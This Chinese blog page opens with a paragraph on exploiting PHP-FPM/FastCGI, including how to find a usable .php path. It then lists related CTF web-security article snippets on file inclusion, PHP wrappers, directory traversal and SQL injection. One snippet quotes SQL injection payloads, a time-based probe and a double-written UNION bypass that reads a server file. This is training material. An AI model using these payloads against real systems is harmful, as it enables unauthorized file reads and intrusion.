本来我们可以执行任意文件,但是在FPM某个版本之后,增加了security.limit_extensions选项,限定了只有某些后缀的文件允许被fpm执行,默认是.php,所以现在要使用这个漏洞,我们得先知道服务器上的一个php文件,假设我们爆破不出来目标环境的web目录,我们可以找找默认源安装后可能存在的php文件,比如/usr/local/lib/php/PEAR.php。FastCGI是一个常驻型的CGI,它在服务器启动的时候先启动一个应用程序池,然后由这个应用程序池来管理和调度应用程序的执行。
【愚公系列】2024年03月 《CTF实战:从入门到提升》 003-Web安全基础知识(HTTP安全)
时光隧道
02-26 8万+
HTTP安全是指在使用HTTP协议进行通信时,采取的一系列措施和技术,以确保传输过程中的数据的机密性、完整性和可信性。HTTP协议本身是一种明文的协议,数据在传输过程中容易被窃听、篡改或伪造。措施描述HTTPS在HTTP协议基础上增加了SSL/TLS加密层,通过对通信内容进行加密以保护数据的机密性。加密使用对称加密或非对称加密算法对敏感数据如用户登录信息或支付信息进行加密,防止数据被窃听。认证通过身份验证技术验证通信双方的身份,确保通信的可信性。
CTF---Web---文件包含---02---rot13伪协议
qq_22160557的博客
07-28 1927
文章目录前言一、题目描述二、解题步骤1、页面跳转2、文件包含(参数为page)3、rot13伪协议包含4、rot13伪协议读取5、rot13编码解码6、代码审计7、构造payload8、得到flag总结 前言 题目分类: CTFWeb—文件包含—02—rot13伪协议 一、题目描述 题目:13、另辟蹊径 (题号为13) 二、解题步骤 1、页面跳转 Step1:点击运维设备,会跳转到http://192.168.87.183/index.php界面。 2、文件包含(参数为page) Step2:点击
【愚公系列】2024年03月 《CTF实战:从入门到提升》 010-Web安全入门(PHP代码执行漏洞)
热门推荐
时光隧道
03-28 9万+
PHP代码执行漏洞是一种常见的安全漏洞,也被称为远程代码执行(Remote Code Execution,RCE)漏洞。这种漏洞的发生通常是由于程序员在编写代码时未正确过滤用户输入,导致用户能够将恶意代码插入到应用程序中,然后被解释器执行。攻击者可以利用这种漏洞执行任意代码,从而获取系统权限、窃取数据或者对系统进行进一步的攻击。未过滤用户输入:开发者在使用用户输入时必须进行严格的输入验证和过滤,避免直接将用户输入作为代码执行。eval() 和 exec() 函数。
CTF】文件包含漏洞-php://filter 流包装器 【详】
2302_79596028的博客
10-23 1700
本文详细介绍了CTF中对于文件包含漏洞可以使用的php://filter流包装器
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)
2401_84208172的博客
05-24 2272
[CTF_网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议),该题考察文件包含漏洞,涉及PHP伪协议data伪协议file伪协议及PHP内置函数等知识点,希望读者躬身实践。黑客&网络安全如何学习。
tar解压目录穿越+联合注入+双写绕过
midi
11-26 3235
tar解压目录穿越+联合注入+双写绕过联合注入+双写绕过tar解压目录穿越 联合注入+双写绕过 之前在太湖web题(CrossFire)上遇到个好玩的题,题目上线很久没有大佬做出来,后来给了提示,刷刷刷都做出来了,赛后学到许多,来这总结下。 官方提示: 注入+目录穿越 1'||sleep(2)%23 存在注入 利用双写来绕过 -1' ununionion selselectect load_file(0x2f7661722f7777772f68746d6c2f696e6465782e706870)%
CTFhub技能树伪web——协议读取文件
weixin_73049307的博客
09-08 392
php:// — 访问各个输入/输出流(I/O streams)伪协议:事实上是其支持的协议封装协议。http:// — 访问 HTTP(s) 网址。ftp:// — 访问 FTP(s) URLs。file:// — 访问本地文件系统。
web安全之目录穿越
weixin_54584489的博客
04-13 4241
目录穿越(又称目录遍历diretory traversal/path traversal)是通过目录控制序列 ../ 或者文件绝对路径来访问存储在文件系统上的任意文件和目录的一种漏洞。
目录穿越/遍历漏洞 -- 学习笔记
angry_program的博客
08-07 2万+
目录 什么是目录遍历? 漏洞原理 实验 0x00 基础目录遍历 0x01 绝对路径 0x02 双写../绕过 0x03 URL编码绕过 0x04 绝对路径配合../ 0x05 截断文件后缀 防御 什么是目录遍历? 目录遍历(目录穿越)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。 这可能包括应用程序代码和数据,后端系统的登录信息以及敏感的操作系统文件。 在某些情况下,攻击者可能能够在服务器上写入任意文件,(如,FFFTP是一款小型...
目录穿越及文件包含漏洞
weixin_45007073的博客
01-31 8495
目录穿越概念 目录穿越(Directory Traversal)攻击是黑客能够在Web应用程序所在的根目录以外的文件夹上,任意地存取被限制的文件夹、执行命令或查找数据。目录穿越攻击,也有人称为Path Traversal攻击。 目录穿越的漏洞危害 攻击者可以使用目录穿越攻击来查找、执行或存取Web应用程序所在的根目录以外的文件夹。如果目录穿越攻击成功,黑客就可以执行破坏性的命令来攻击网站 文件操作漏洞的分类 代码展示 先来简单展示一下目录穿越的原理,先在当前目录下新建一个file文件夹,里面建一个1.tx
目录穿越漏洞概念实验
Au_Wind的博客
02-07 3342
概念和实验参考自portswigger – https://portswigger.net/web-security/file-path-traversal思维导图如下。
Web安全之PHP的伪协议漏洞利用,以及伪协议漏洞防护方法
Scalzdp的专栏
11-13 3150
单纯看伪协议利用之前的文件包含漏洞及其相似,但是在真实环境中是对用户输入进行了过滤替换的,在使用漏洞就需要不断考虑如何绕过这些过滤条件。只要我们开发过程中对于使用了伪协议这些函数的时候,一定要严格对用户参数进行过滤,避免一时偷懒导致服务器被黑,其实最终难逃其就。如有还不太理解或有其他想法的小伙伴们都可以私信我或评论区打出来哟,如有写的不好的地方也请大家多多包涵。
web安全目录遍历漏洞学习及绕过
m0re's blog
09-08 4688
本文目录目录遍历漏洞介绍一些绕过方式防御如何利用目录遍历上传shell并拿到一个低权限 目录遍历漏洞介绍 路径遍历攻击(也称为目录遍历)是指在访问储存在web目录文件夹之外的文件和目录。通过操纵带有“点-斜线(…)”序列及其变化的文件或使用绝对文件路径来引用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置和关键系统文件。 需要注意的是,系统操作访问控制(如在微软windows操作系统上锁定或使用文件)限制了对文件的访问权限。 这种攻击也称为 “点-点斜线”、“目录遍历”、“目
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值